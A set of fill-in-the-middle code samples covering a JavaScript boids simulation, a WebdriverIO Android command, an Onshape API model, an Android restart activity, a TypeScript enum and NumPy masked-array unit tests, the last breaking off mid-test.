drawVector(boids[i].x,boids[i].y,boids[i].vx,boids[i].vy);
};
}
/*
//mouseEvent
document.onmousemove = function (event){
destination ={
x:event.screenX,
y:event.screenY
}
};
*/
function Boid(){
this.x = Math.random()*width;
this.y = Math.random()*height;
this.vx = 0.0;
this.vy = 0.0;
this.dx = Math.random()*width;
this.dy = Math.random()*height;
//群れの中心に向かう
this.rule1 = function(){
var centerx = 0,
centery = 0;
for (var i = 0; i < boids.length; i++) {
if (boids[i] != this) {
centerx += boids[i].x;
centery += boids[i].y;
};
};
centerx /= MAX_NUMBER-1;
centery /= MAX_NUMBER-1;
this.vx += (centerx-this.x)/1000;
this.vy += (centery-this.y)/1000;
}
//他の個体と離れるように動く
this.rule2 = function(){
var _vx = 0,
_vy = 0;
for (var i = 0; i < boids.length; i++) {
if(this != boids[i]){
var distance = distanceTo(this.x,boids[i].x,this.y,boids[i].y);
if(distance<25){
distance += 0.001;
_vx -= (boids[i].x - this.x)/distance;
_vy -= (boids[i].y - this.y)/distance;
//this.dx = -boids[i].x;
//this.dy = -boids[i].y;
}
}
};
this.vx += _vx;
this.vy += _vy;
}
//他の個体と同じ速度で動こうとする
this.rule3 = function(){
var _pvx = 0,
_pvy = 0;
for (var i = 0; i < boids.length; i++) {
if (boids[i] != this) {
_pvx += boids[i].vx;
_pvy += boids[i].vy;
}
};
_pvx /= MAX_NUMBER-1;
_pvy /= MAX_NUMBER-1;
this.vx += (_pvx - this.vx)/10;
this.vy += (_pvy - this.vy)/10;
};
//壁側の時の振る舞い
this.rule4 = function(){
if(this.x < 10 && this.vx < 0)this.vx += 10/(Math.abs( this.x ) + 1 );
if(this.x > width && this.vx > 0)this.vx -= 10/(Math.abs( width - this.x ) + 1 );
if (this.y < 10 && this.vy < 0)this.vy += 10/(Math.abs( this.y ) + 1 );
if(this.y > height && this.vy > 0)this.vy -= 10/(Math.abs( height - this.y ) + 1 );<|fim▁hole|>
//目的地に行く
this.rule5 = function(){
var _dx = this.dx - this.x,
_dy = this.dy - this.y;
this.vx += (this.dx - this.x)/500;
this.vy += (this.dy - this.y)/500;
}
//捕食する
this.rule6 = function(){
var _vx = Math.random()-0.5,
_vy = Math.random()-0.5;
for (var i = 0; i < boids.length; i++) {
if(this != boids[i] && this.dx != boids[i].dx && this.dy != boids[i].dy){
var distance = distanceTo(this.x,boids[i].x,this.y,boids[i].y);
if(distance<20 && distance>15){
console.log(distance);
distance += 0.001;
_vx += (boids[i].x - this.x)/distance;
_vy += (boids[i].y - this.y)/distance;
drawLine(this.x,this.y,boids[i].x,boids[i].y);
this.dx = boids[i].dx;
this.dy = boids[i].dy;
}
}
};
this.vx += _vx;
this.vy += _vy;
}
}
function distanceTo(x1,x2,y1,y2){
var dx = x2-x1,
dy = y2-y1;
return Math.sqrt(dx*dx+dy*dy);
}
function drawCircle(x,y){
context.beginPath();
context.strokeStyle = "#fff";
context.arc(x,y,radius,0,Math.PI*2,false);
context.stroke();
}
const VectorLong = 10;
function drawVector(x,y,vx,vy){
context.beginPath();
var pointx = x+vx*VectorLong;
var pointy = y+vy*VectorLong;
context.moveTo(x,y);
context.lineTo(pointx,pointy);
context.stroke();
}
function drawLine(x1,y1,x2,y2){
context.beginPath();
context.moveTo(x1,y1);
context.lineTo(x2,y2);
context.stroke();
}<|fim▁end|>
|
};
|
<|file_name|>startActivity.js<|end_file_name|><|fim▁begin|>'use strict';
Object.defineProperty(exports, "__esModule", {
value: true
});
var _ErrorHandler = require('../utils/ErrorHandler');
var startActivity = function startActivity(appPackage, appActivity) {
if (typeof appPackage !== 'string' || typeof appActivity !== 'string') {
throw new _ErrorHandler.ProtocolError('startActivity command requires two parameter (appPackage, appActivity) from type string');
}
return this.requestHandler.create('/session/:sessionId/appium/device/start_activity', { appPackage: appPackage, appActivity: appActivity });
}; /**
*
* Start an arbitrary Android activity during a session.
*
* <example>
:startActivity.js
browser.startActivity({
appPackage: 'io.appium.android.apis',<|fim▁hole|> });
* </example>
*
* @param {String} appPackage name of app
* @param {String} appActivity name of activity
* @type mobile
* @for android
*
*/
exports.default = startActivity;
module.exports = exports['default'];<|fim▁end|>
|
appActivity: '.view.DragAndDropDemo'
|
<|file_name|>bt_default_unit_info.py<|end_file_name|><|fim▁begin|># coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
class BTDefaultUnitInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"key": (str,), # noqa: E501
"value": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"key": "key", # noqa: E501
"value": "value", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]<|fim▁hole|>
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_default_unit_info.BTDefaultUnitInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
key (str): [optional] # noqa: E501
value (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)<|fim▁end|>
|
)
|
<|file_name|>ClearStack.java<|end_file_name|><|fim▁begin|>package cat.ereza.customactivityoncrash.activity;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import cat.ereza.customactivityoncrash.CustomActivityOnCrash;
/**<|fim▁hole|>{
@Override
protected void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
Intent intent = getIntent().getParcelableExtra(CustomActivityOnCrash.KEY_CURRENT_INTENT);
startActivity(intent);
finish();
Runtime.getRuntime().exit(0);
}
}<|fim▁end|>
|
* Created by zhy on 15/8/4.
*/
public class ClearStack extends Activity
|
<|file_name|>login-status.enum.ts<|end_file_name|><|fim▁begin|>export enum LoginStatus {
AUTHENTICATED = 1,
NOT_AUTHENTICATED,
FORM_ERRORS,
SERVER_ERROR<|fim▁hole|><|fim▁end|>
|
}
|
<|file_name|>test_core.py<|end_file_name|><|fim▁begin|># pylint: disable-msg=W0401,W0511,W0611,W0612,W0614,R0201,E1102
"""Tests suite for MaskedArray & subclassing.
:author: Pierre Gerard-Marchant
:contact: pierregm_at_uga_dot_edu
"""
from __future__ import division, absolute_import, print_function
__author__ = "Pierre GF Gerard-Marchant"
import warnings
import pickle
import operator
from functools import reduce
import numpy as np
import numpy.ma.core
import numpy.core.fromnumeric as fromnumeric
import numpy.core.umath as umath
from numpy.testing import TestCase, run_module_suite, assert_raises
from numpy import ndarray
from numpy.compat import asbytes, asbytes_nested
from numpy.ma.testutils import (
assert_, assert_array_equal, assert_equal, assert_almost_equal,
assert_equal_records, fail_if_equal, assert_not_equal,
assert_mask_equal,
)
from numpy.ma.core import (
MAError, MaskError, MaskType, MaskedArray, abs, absolute, add, all,
allclose, allequal, alltrue, angle, anom, arange, arccos, arctan2,
arcsin, arctan, argsort, array, asarray, choose, concatenate,
conjugate, cos, cosh, count, default_fill_value, diag, divide, empty,
empty_like, equal, exp, flatten_mask, filled, fix_invalid,
flatten_structured_array, fromflex, getmask, getmaskarray, greater,
greater_equal, identity, inner, isMaskedArray, less, less_equal, log,
log10, make_mask, make_mask_descr, mask_or, masked, masked_array,
masked_equal, masked_greater, masked_greater_equal, masked_inside,
masked_less, masked_less_equal, masked_not_equal, masked_outside,
masked_print_option, masked_values, masked_where, max, maximum,
maximum_fill_value, min, minimum, minimum_fill_value, mod, multiply,
mvoid, nomask, not_equal, ones, outer, power, product, put, putmask,
ravel, repeat, reshape, resize, shape, sin, sinh, sometrue, sort, sqrt,
subtract, sum, take, tan, tanh, transpose, where, zeros,
)
pi = np.pi
class TestMaskedArray(TestCase):
# Base test class for MaskedArrays.
def setUp(self):
# Base data definition.
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
a10 = 10.
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = np.array([-.5, 0., .5, .8])
zm = masked_array(z, mask=[0, 1, 0, 0])
xf = np.where(m1, 1e+20, x)
xm.set_fill_value(1e+20)
self.d = (x, y, a10, m1, m2, xm, ym, z, zm, xf)
def test_basicattributes(self):
# Tests some basic array attributes.
a = array([1, 3, 2])
b = array([1, 3, 2], mask=[1, 0, 1])
assert_equal(a.ndim, 1)
assert_equal(b.ndim, 1)
assert_equal(a.size, 3)
assert_equal(b.size, 3)
assert_equal(a.shape, (3,))
assert_equal(b.shape, (3,))
def test_basic0d(self):
# Checks masking a scalar
x = masked_array(0)
assert_equal(str(x), '0')
x = masked_array(0, mask=True)
assert_equal(str(x), str(masked_print_option))
x = masked_array(0, mask=False)
assert_equal(str(x), '0')
x = array(0, mask=1)
self.assertTrue(x.filled().dtype is x._data.dtype)
def test_basic1d(self):
# Test of basic array creation and properties in 1 dimension.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
self.assertTrue(not isMaskedArray(x))
self.assertTrue(isMaskedArray(xm))
self.assertTrue((xm - ym).filled(0).any())
fail_if_equal(xm.mask.astype(int), ym.mask.astype(int))
s = x.shape
assert_equal(np.shape(xm), s)
assert_equal(xm.shape, s)
assert_equal(xm.dtype, x.dtype)
assert_equal(zm.dtype, z.dtype)
assert_equal(xm.size, reduce(lambda x, y:x * y, s))
assert_equal(count(xm), len(m1) - reduce(lambda x, y:x + y, m1))
assert_array_equal(xm, xf)
assert_array_equal(filled(xm, 1.e20), xf)
assert_array_equal(x, xm)
def test_basic2d(self):
# Test of basic array creation and properties in 2 dimensions.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
for s in [(4, 3), (6, 2)]:
x.shape = s
y.shape = s
xm.shape = s
ym.shape = s
xf.shape = s
self.assertTrue(not isMaskedArray(x))
self.assertTrue(isMaskedArray(xm))
assert_equal(shape(xm), s)
assert_equal(xm.shape, s)
assert_equal(xm.size, reduce(lambda x, y:x * y, s))
assert_equal(count(xm), len(m1) - reduce(lambda x, y:x + y, m1))
assert_equal(xm, xf)
assert_equal(filled(xm, 1.e20), xf)
assert_equal(x, xm)
def test_concatenate_basic(self):
# Tests concatenations.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
# basic concatenation
assert_equal(np.concatenate((x, y)), concatenate((xm, ym)))
assert_equal(np.concatenate((x, y)), concatenate((x, y)))
assert_equal(np.concatenate((x, y)), concatenate((xm, y)))
assert_equal(np.concatenate((x, y, x)), concatenate((x, ym, x)))
def test_concatenate_alongaxis(self):
# Tests concatenations.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
# Concatenation along an axis
s = (3, 4)
x.shape = y.shape = xm.shape = ym.shape = s
assert_equal(xm.mask, np.reshape(m1, s))
assert_equal(ym.mask, np.reshape(m2, s))
xmym = concatenate((xm, ym), 1)
assert_equal(np.concatenate((x, y), 1), xmym)
assert_equal(np.concatenate((xm.mask, ym.mask), 1), xmym._mask)
x = zeros(2)
y = array(ones(2), mask=[False, True])
z = concatenate((x, y))
assert_array_equal(z, [0, 0, 1, 1])
assert_array_equal(z.mask, [False, False, False, True])
z = concatenate((y, x))
assert_array_equal(z, [1, 1, 0, 0])
assert_array_equal(z.mask, [False, True, False, False])
def test_concatenate_flexible(self):
# Tests the concatenation on flexible arrays.
data = masked_array(list(zip(np.random.rand(10),
np.arange(10))),
dtype=[('a', float), ('b', int)])
test = concatenate([data[:5], data[5:]])
assert_equal_records(test, data)
def test_creation_ndmin(self):
# Check the use of ndmin
x = array([1, 2, 3], mask=[1, 0, 0], ndmin=2)
assert_equal(x.shape, (1, 3))
assert_equal(x._data, [[1, 2, 3]])
assert_equal(x._mask, [[1, 0, 0]])
def test_creation_ndmin_from_maskedarray(self):
# Make sure we're not losing the original mask w/ ndmin
x = array([1, 2, 3])
x[-1] = masked
xx = array(x, ndmin=2, dtype=float)
assert_equal(x.shape, x._mask.shape)
assert_equal(xx.shape, xx._mask.shape)
def test_creation_maskcreation(self):
# Tests how masks are initialized at the creation of Maskedarrays.
data = arange(24, dtype=float)
data[[3, 6, 15]] = masked
dma_1 = MaskedArray(data)
assert_equal(dma_1.mask, data.mask)
dma_2 = MaskedArray(dma_1)
assert_equal(dma_2.mask, dma_1.mask)
dma_3 = MaskedArray(dma_1, mask=[1, 0, 0, 0] * 6)
fail_if_equal(dma_3.mask, dma_1.mask)
def test_creation_with_list_of_maskedarrays(self):
# Tests creaating a masked array from alist of masked arrays.
x = array(np.arange(5), mask=[1, 0, 0, 0, 0])
data = array((x, x[::-1]))
assert_equal(data, [[0, 1, 2, 3, 4], [4, 3, 2, 1, 0]])
assert_equal(data._mask, [[1, 0, 0, 0, 0], [0, 0, 0, 0, 1]])
x.mask = nomask
data = array((x, x[::-1]))
assert_equal(data, [[0, 1, 2, 3, 4], [4, 3, 2, 1, 0]])
self.assertTrue(data.mask is nomask)
def test_asarray(self):
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
xm.fill_value = -9999
xm._hardmask = True
xmm = asarray(xm)
assert_equal(xmm._data, xm._data)
assert_equal(xmm._mask, xm._mask)
assert_equal(xmm.fill_value, xm.fill_value)
assert_equal(xmm._hardmask, xm._hardmask)
def test_fix_invalid(self):
# Checks fix_invalid.
with np.errstate(invalid='ignore'):
data = masked_array([np.nan, 0., 1.], mask=[0, 0, 1])
data_fixed = fix_invalid(data)
assert_equal(data_fixed._data, [data.fill_value, 0., 1.])
assert_equal(data_fixed._mask, [1., 0., 1.])
def test_maskedelement(self):
# Test of masked element
x = arange(6)
x[1] = masked
self.assertTrue(str(masked) == '--')
self.assertTrue(x[1] is masked)
assert_equal(filled(x[1], 0), 0)
# don't know why these should raise an exception...
#self.assertRaises(Exception, lambda x,y: x+y, masked, masked)
#self.assertRaises(Exception, lambda x,y: x+y, masked, 2)
#self.assertRaises(Exception, lambda x,y: x+y, masked, xx)
#self.assertRaises(Exception, lambda x,y: x+y, xx, masked)
def test_set_element_as_object(self):
# Tests setting elements with object
a = empty(1, dtype=object)
x = (1, 2, 3, 4, 5)
a[0] = x
assert_equal(a[0], x)
self.assertTrue(a[0] is x)
import datetime
dt = datetime.datetime.now()
a[0] = dt
self.assertTrue(a[0] is dt)
def test_indexing(self):
# Tests conversions and indexing
x1 = np.array([1, 2, 4, 3])
x2 = array(x1, mask=[1, 0, 0, 0])
x3 = array(x1, mask=[0, 1, 0, 1])
x4 = array(x1)
# test conversion to strings
str(x2) # raises?
repr(x2) # raises?
assert_equal(np.sort(x1), sort(x2, endwith=False))
# tests of indexing
assert_(type(x2[1]) is type(x1[1]))
assert_(x1[1] == x2[1])
assert_(x2[0] is masked)
assert_equal(x1[2], x2[2])
assert_equal(x1[2:5], x2[2:5])
assert_equal(x1[:], x2[:])
assert_equal(x1[1:], x3[1:])
x1[2] = 9
x2[2] = 9
assert_equal(x1, x2)
x1[1:3] = 99
x2[1:3] = 99
assert_equal(x1, x2)
x2[1] = masked
assert_equal(x1, x2)
x2[1:3] = masked
assert_equal(x1, x2)
x2[:] = x1
x2[1] = masked
assert_(allequal(getmask(x2), array([0, 1, 0, 0])))
x3[:] = masked_array([1, 2, 3, 4], [0, 1, 1, 0])
assert_(allequal(getmask(x3), array([0, 1, 1, 0])))
x4[:] = masked_array([1, 2, 3, 4], [0, 1, 1, 0])
assert_(allequal(getmask(x4), array([0, 1, 1, 0])))
assert_(allequal(x4, array([1, 2, 3, 4])))
x1 = np.arange(5) * 1.0
x2 = masked_values(x1, 3.0)
assert_equal(x1, x2)
assert_(allequal(array([0, 0, 0, 1, 0], MaskType), x2.mask))
assert_equal(3.0, x2.fill_value)
x1 = array([1, 'hello', 2, 3], object)
x2 = np.array([1, 'hello', 2, 3], object)
s1 = x1[1]
s2 = x2[1]
assert_equal(type(s2), str)
assert_equal(type(s1), str)
assert_equal(s1, s2)
assert_(x1[1:1].shape == (0,))
def test_matrix_indexing(self):
# Tests conversions and indexing
x1 = np.matrix([[1, 2, 3], [4, 3, 2]])
x2 = array(x1, mask=[[1, 0, 0], [0, 1, 0]])
x3 = array(x1, mask=[[0, 1, 0], [1, 0, 0]])
x4 = array(x1)
# test conversion to strings
str(x2) # raises?
repr(x2) # raises?
# tests of indexing
assert_(type(x2[1, 0]) is type(x1[1, 0]))
assert_(x1[1, 0] == x2[1, 0])
assert_(x2[1, 1] is masked)
assert_equal(x1[0, 2], x2[0, 2])
assert_equal(x1[0, 1:], x2[0, 1:])
assert_equal(x1[:, 2], x2[:, 2])
assert_equal(x1[:], x2[:])
assert_equal(x1[1:], x3[1:])
x1[0, 2] = 9
x2[0, 2] = 9
assert_equal(x1, x2)
x1[0, 1:] = 99
x2[0, 1:] = 99
assert_equal(x1, x2)
x2[0, 1] = masked
assert_equal(x1, x2)
x2[0, 1:] = masked
assert_equal(x1, x2)
x2[0, :] = x1[0, :]
x2[0, 1] = masked
assert_(allequal(getmask(x2), np.array([[0, 1, 0], [0, 1, 0]])))
x3[1, :] = masked_array([1, 2, 3], [1, 1, 0])
assert_(allequal(getmask(x3)[1], array([1, 1, 0])))
assert_(allequal(getmask(x3[1]), array([1, 1, 0])))
x4[1, :] = masked_array([1, 2, 3], [1, 1, 0])
assert_(allequal(getmask(x4[1]), array([1, 1, 0])))
assert_(allequal(x4[1], array([1, 2, 3])))
x1 = np.matrix(np.arange(5) * 1.0)
x2 = masked_values(x1, 3.0)
assert_equal(x1, x2)
assert_(allequal(array([0, 0, 0, 1, 0], MaskType), x2.mask))
assert_equal(3.0, x2.fill_value)
def test_copy(self):
# Tests of some subtle points of copying and sizing.
n = [0, 0, 1, 0, 0]
m = make_mask(n)
m2 = make_mask(m)
self.assertTrue(m is m2)
m3 = make_mask(m, copy=1)
self.assertTrue(m is not m3)
x1 = np.arange(5)
y1 = array(x1, mask=m)
#self.assertTrue( y1._data is x1)
assert_equal(y1._data.__array_interface__, x1.__array_interface__)
self.assertTrue(allequal(x1, y1.data))
#self.assertTrue( y1.mask is m)
assert_equal(y1._mask.__array_interface__, m.__array_interface__)
y1a = array(y1)
self.assertTrue(y1a._data.__array_interface__ ==
y1._data.__array_interface__)
self.assertTrue(y1a.mask is y1.mask)
y2 = array(x1, mask=m)
self.assertTrue(y2._data.__array_interface__ == x1.__array_interface__)
#self.assertTrue( y2.mask is m)
self.assertTrue(y2._mask.__array_interface__ == m.__array_interface__)
self.assertTrue(y2[2] is masked)
y2[2] = 9
self.assertTrue(y2[2] is not masked)
#self.assertTrue( y2.mask is not m)
self.assertTrue(y2._mask.__array_interface__ != m.__array_interface__)
self.assertTrue(allequal(y2.mask, 0))
y3 = array(x1 * 1.0, mask=m)
self.assertTrue(filled(y3).dtype is (x1 * 1.0).dtype)
x4 = arange(4)
x4[2] = masked
y4 = resize(x4, (8,))
assert_equal(concatenate([x4, x4]), y4)
assert_equal(getmask(y4), [0, 0, 1, 0, 0, 0, 1, 0])
y5 = repeat(x4, (2, 2, 2, 2), axis=0)
assert_equal(y5, [0, 0, 1, 1, 2, 2, 3, 3])
y6 = repeat(x4, 2, axis=0)
assert_equal(y5, y6)
y7 = x4.repeat((2, 2, 2, 2), axis=0)
assert_equal(y5, y7)
y8 = x4.repeat(2, 0)
assert_equal(y5, y8)
y9 = x4.copy()
assert_equal(y9._data, x4._data)
assert_equal(y9._mask, x4._mask)
x = masked_array([1, 2, 3], mask=[0, 1, 0])
# Copy is False by default
y = masked_array(x)
assert_equal(y._data.ctypes.data, x._data.ctypes.data)
assert_equal(y._mask.ctypes.data, x._mask.ctypes.data)
y = masked_array(x, copy=True)
assert_not_equal(y._data.ctypes.data, x._data.ctypes.data)
assert_not_equal(y._mask.ctypes.data, x._mask.ctypes.data)
def test_deepcopy(self):
from copy import deepcopy
a = array([0, 1, 2], mask=[False, True, False])
copied = deepcopy(a)
assert_equal(copied.mask, a.mask)
assert_not_equal(id(a._mask), id(copied._mask))
copied[1] = 1
assert_equal(copied.mask, [0, 0, 0])
assert_equal(a.mask, [0, 1, 0])
copied = deepcopy(a)
assert_equal(copied.mask, a.mask)
copied.mask[1] = False
assert_equal(copied.mask, [0, 0, 0])
assert_equal(a.mask, [0, 1, 0])
def test_str_repr(self):
a = array([0, 1, 2], mask=[False, True, False])
assert_equal(str(a), '[0 -- 2]')
assert_equal(repr(a), 'masked_array(data = [0 -- 2],\n'
' mask = [False True False],\n'
' fill_value = 999999)\n')
def test_pickling(self):
# Tests pickling
a = arange(10)
a[::3] = masked
a.fill_value = 999
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled._data, a._data)
assert_equal(a_pickled.fill_value, 999)
def test_pickling_subbaseclass(self):
# Test pickling w/ a subclass of ndarray
a = array(np.matrix(list(range(10))), mask=[1, 0, 1, 0, 0] * 2)
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled, a)
self.assertTrue(isinstance(a_pickled._data, np.matrix))
def test_pickling_maskedconstant(self):
# Test pickling MaskedConstant
mc = np.ma.masked
mc_pickled = pickle.loads(mc.dumps())
assert_equal(mc_pickled._baseclass, mc._baseclass)
assert_equal(mc_pickled._mask, mc._mask)
assert_equal(mc_pickled._data, mc._data)
def test_pickling_wstructured(self):
# Tests pickling w/ structured array
a = array([(1, 1.), (2, 2.)], mask=[(0, 0), (0, 1)],
dtype=[('a', int), ('b', float)])
a_pickled = pickle.loads(a.dumps())
assert_equal(a_pickled._mask, a._mask)
assert_equal(a_pickled, a)
def test_pickling_keepalignment(self):
# Tests pickling w/ F_CONTIGUOUS arrays
a = arange(10)
a.shape = (-1, 2)
b = a.T
test = pickle.loads(pickle.dumps(b))
assert_equal(test, b)
def test_single_element_subscript(self):
# Tests single element subscripts of Maskedarrays.
a = array([1, 3, 2])
b = array([1, 3, 2], mask=[1, 0, 1])
assert_equal(a[0].shape, ())
assert_equal(b[0].shape, ())
assert_equal(b[1].shape, ())
def test_topython(self):
# Tests some communication issues with Python.
assert_equal(1, int(array(1)))
assert_equal(1.0, float(array(1)))
assert_equal(1, int(array([[[1]]])))
assert_equal(1.0, float(array([[1]])))
self.assertRaises(TypeError, float, array([1, 1]))
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_(np.isnan(float(array([1], mask=[1]))))
a = array([1, 2, 3], mask=[1, 0, 0])
self.assertRaises(TypeError, lambda:float(a))
assert_equal(float(a[-1]), 3.)
self.assertTrue(np.isnan(float(a[0])))
self.assertRaises(TypeError, int, a)
assert_equal(int(a[-1]), 3)
self.assertRaises(MAError, lambda:int(a[0]))
def test_oddfeatures_1(self):
# Test of other odd features
x = arange(20)
x = x.reshape(4, 5)
x.flat[5] = 12
assert_(x[1, 0] == 12)
z = x + 10j * x
assert_equal(z.real, x)
assert_equal(z.imag, 10 * x)
assert_equal((z * conjugate(z)).real, 101 * x * x)
z.imag[...] = 0.0
x = arange(10)
x[3] = masked
assert_(str(x[3]) == str(masked))
c = x >= 8
assert_(count(where(c, masked, masked)) == 0)
assert_(shape(where(c, masked, masked)) == c.shape)
z = masked_where(c, x)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is not masked)
assert_(z[7] is not masked)
assert_(z[8] is masked)
assert_(z[9] is masked)
assert_equal(x, z)
def test_oddfeatures_2(self):
# Tests some more features.
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
def test_oddfeatures_3(self):
# Tests some generic features
atest = array([10], mask=True)
btest = array([20])
idx = atest.mask
atest[idx] = btest[idx]
assert_equal(atest, [20])
def test_filled_w_object_dtype(self):
a = np.ma.masked_all(1, dtype='O')
assert_equal(a.filled('x')[0], 'x')
def test_filled_w_flexible_dtype(self):
# Test filled w/ flexible dtype
flexi = array([(1, 1, 1)],
dtype=[('i', int), ('s', '|S8'), ('f', float)])
flexi[0] = masked
assert_equal(flexi.filled(),
np.array([(default_fill_value(0),
default_fill_value('0'),
default_fill_value(0.),)], dtype=flexi.dtype))
flexi[0] = masked
assert_equal(flexi.filled(1),
np.array([(1, '1', 1.)], dtype=flexi.dtype))
def test_filled_w_mvoid(self):
# Test filled w/ mvoid
ndtype = [('a', int), ('b', float)]
a = mvoid((1, 2.), mask=[(0, 1)], dtype=ndtype)
# Filled using default
test = a.filled()
assert_equal(tuple(test), (1, default_fill_value(1.)))
# Explicit fill_value
test = a.filled((-1, -1))
assert_equal(tuple(test), (1, -1))
# Using predefined filling values
a.fill_value = (-999, -999)
assert_equal(tuple(a.filled()), (1, -999))
def test_filled_w_nested_dtype(self):
# Test filled w/ nested dtype
ndtype = [('A', int), ('B', [('BA', int), ('BB', int)])]
a = array([(1, (1, 1)), (2, (2, 2))],
mask=[(0, (1, 0)), (0, (0, 1))], dtype=ndtype)
test = a.filled(0)
control = np.array([(1, (0, 1)), (2, (2, 0))], dtype=ndtype)
assert_equal(test, control)
test = a['B'].filled(0)
control = np.array([(0, 1), (2, 0)], dtype=a['B'].dtype)
assert_equal(test, control)
def test_filled_w_f_order(self):
# Test filled w/ F-contiguous array
a = array(np.array([(0, 1, 2), (4, 5, 6)], order='F'),
mask=np.array([(0, 0, 1), (1, 0, 0)], order='F'),
order='F') # this is currently ignored
self.assertTrue(a.flags['F_CONTIGUOUS'])
self.assertTrue(a.filled(0).flags['F_CONTIGUOUS'])
def test_optinfo_propagation(self):
# Checks that _optinfo dictionary isn't back-propagated
x = array([1, 2, 3, ], dtype=float)
x._optinfo['info'] = '???'
y = x.copy()
assert_equal(y._optinfo['info'], '???')
y._optinfo['info'] = '!!!'
assert_equal(x._optinfo['info'], '???')
def test_fancy_printoptions(self):
# Test printing a masked array w/ fancy dtype.
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = array([(1, (2, 3.0)), (4, (5, 6.0))],
mask=[(1, (0, 1)), (0, (1, 0))],
dtype=fancydtype)
control = "[(--, (2, --)) (4, (--, 6.0))]"
assert_equal(str(test), control)
def test_flatten_structured_array(self):
# Test flatten_structured_array on arrays
# On ndarray
ndtype = [('a', int), ('b', float)]
a = np.array([(1, 1), (2, 2)], dtype=ndtype)
test = flatten_structured_array(a)
control = np.array([[1., 1.], [2., 2.]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
# On masked_array
a = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = flatten_structured_array(a)
control = array([[1., 1.], [2., 2.]],
mask=[[0, 1], [1, 0]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
assert_equal(test.mask, control.mask)
# On masked array with nested structure
ndtype = [('a', int), ('b', [('ba', int), ('bb', float)])]
a = array([(1, (1, 1.1)), (2, (2, 2.2))],
mask=[(0, (1, 0)), (1, (0, 1))], dtype=ndtype)
test = flatten_structured_array(a)
control = array([[1., 1., 1.1], [2., 2., 2.2]],
mask=[[0, 1, 0], [1, 0, 1]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
assert_equal(test.mask, control.mask)
# Keeping the initial shape
ndtype = [('a', int), ('b', float)]
a = np.array([[(1, 1), ], [(2, 2), ]], dtype=ndtype)
test = flatten_structured_array(a)
control = np.array([[[1., 1.], ], [[2., 2.], ]], dtype=np.float)
assert_equal(test, control)
assert_equal(test.dtype, control.dtype)
def test_void0d(self):
# Test creating a mvoid object
ndtype = [('a', int), ('b', int)]
a = np.array([(1, 2,)], dtype=ndtype)[0]
